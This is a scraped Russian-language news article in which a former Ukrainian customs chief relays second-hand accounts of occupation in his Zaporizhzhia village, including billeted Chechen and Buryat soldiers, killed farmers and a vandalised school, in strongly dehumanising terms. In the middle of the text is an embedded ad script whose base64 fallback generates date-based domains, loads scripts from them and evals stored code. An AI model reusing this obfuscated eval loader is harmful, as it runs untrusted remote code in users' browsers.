«Буряты моют ноги чеченцам»: фермер рассказал об иерархии оккупантов в Запорожской области

Анатолий Макаренко, капитан 1-го ранга в запасе, генерал-лейтенант таможенной службы, который в 2009–2010-м и 2014–2015 годах возглавлял украинскую таможню, рассказал, что тяжело переживает оккупацию села Тарасовка Пологовского района Запорожской области, в котором родился.

«Конечно, больно. Мое село родное в оккупации. Я знаю, какие там трагические события произошли… [Мне рассказывал] мой друг Иван – мой близкий товарищ, земляк, он на три года младше меня, я ему щелбаны в школе давал, а потом он стал мощным фермером. Сам себя создал. Из ничего! Трудяга колоссальный! Работу давал людям, село поддерживал как мог», – рассказал Макаренко.

По словам его товарища, в Тарасовке было много чеченских и бурятских солдат, сообщает интернет-издание «Гордон». 

«Это вообще уникальная история… Как он мне рассказал, у него стояли в доме чеченцы и буряты. И буряты чеченцам ноги мыли. Он это видел! И он был в шоке, – рассказал Макаренко. – Однажды он звонит мне – связь, слава богу, была – и говорит (я перехожу на украинский, на наш суржик, на котором говорят в Запорожье): «Толя, ти чуєш?» – «А що там таке случілось у вас?» – «Там стоять чечени і буряти. Оце приїхали й сказали, що завтра треба вийти в поле. Бо приїде російське тєлєвідєніє і буде знімать, як я благодарно буду сіять для них пшеницю». – «І що ти рішив, Ванєчка?» – «Я або сам застрелюсь, або когось із них застрелю, але в поле не вийду».

Макаренко посоветовал другу вместе с семьей срочно эвакуироваться. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

«У него получилось, он выехал. А несколько наших общих знакомых – фермеров, подчеркиваю – остались там. Прошло время, Ваня набирает меня и говорит: «Знаешь, что с этими ребятами? Холмики». – «Какие холмики?» – «В степи». Их убили. Что можно сказать? Какое оправдание этому можно найти? Они выросли на этой земле, поднимали эту землю, а пришла какая-то нечисть… Я не хочу их даже называть людьми, солдатами. И неважно, какой они национальности – буряты, тунгусы, чеченцы, русские… Нечисть! Ты пришел на чужую землю, ее забираешь и убиваешь», – сказал бывший глава таможни.

Макаренко назвал российскую армию «мерзкой, наглой ордой», которая уничтожает все, что встречается на ее пути, в том числе школы. Он рассказал, что в родном селе помог оборудовать школу, в которой учился, но оккупанты добрались и туда.

«Я очень любил свою школу и люблю. И когда мне выслали фотографии разбитого компьютерного класса, который мы создали, уничтоженных интерактивных досок, просто расстрелянных, разбитых, загаженных кабинетов, где детвора моего села училась, росла, – это был первый раз во время войны, когда у меня пробило слезу, – сказал Макаренко. – И потом меня поразила одна из фотографий, где на доске написано: «Простите, мы не хотели». Вот сначала все обгадить, уничтожить, а потом что-то сказать… Какое «простите»? Хотели вы, все осознанно делали». 

Подписывайтесь на Акцент в

(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/buryaty-moyut-nogi-chechentsam-fermer-rasskazal-ob-ierarhii-okkupantov-v-zaporozhskoj-oblasti/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top